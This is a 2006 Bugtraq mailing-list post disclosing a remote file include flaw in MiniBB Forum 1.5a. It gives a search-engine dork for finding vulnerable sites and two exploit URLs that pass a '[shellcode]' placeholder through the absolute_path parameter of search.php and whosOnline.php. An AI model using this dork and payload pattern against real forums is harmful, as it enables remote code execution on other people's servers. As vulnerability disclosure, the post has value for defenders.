Bugtraq mailing list archives

MiniBB Forum <= 1.5a Remote File Include (search.php-whosOnline.php)

From: "AG Spider" <ag-spider () hotmail com>
Date: Fri, 21 Jul 2006 20:33:43 +0000

Title : MiniBB Forum <= 1.5a Remote File Include (search.php-whosOnline.php)
###############################################################################

Discovered By  ::::  {{AG-Spider & KaBaRa.HaCk .eGy}}

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 1.5a (search.php-whosOnline.php)version :version [ 1.5 ]

exploit          :Remote File Include
-----------------------------------------------------------------------------

dork        : "Powered by miniBB 1.5 ©"
Exploit    :  http://www.example.com/search.php?absolute_path=[shellcode]?

http://www.example.com/whosOnline.php?absolute_path=[shellcode]?


----------------------------------------------------------------------------

greetz4: [ Black-Code  -  KILLERxXx - Mr.SheHa - eGyPT GHosT]

c0natct us : KaBaRa.HaCk.eGy [ at ] HoTMail.CoM
                   AG-Spider [ at ] HoTMail.CoM

_________________________________________________________________

Windows Live Messenger has arrived. Click here to download it for free!http://imagine-msn.com/messenger/launch80/?locale=en-gb

Current thread:

MiniBB Forum <= 1.5a Remote File Include (search.php-whosOnline.php) AG Spider (Jul 22)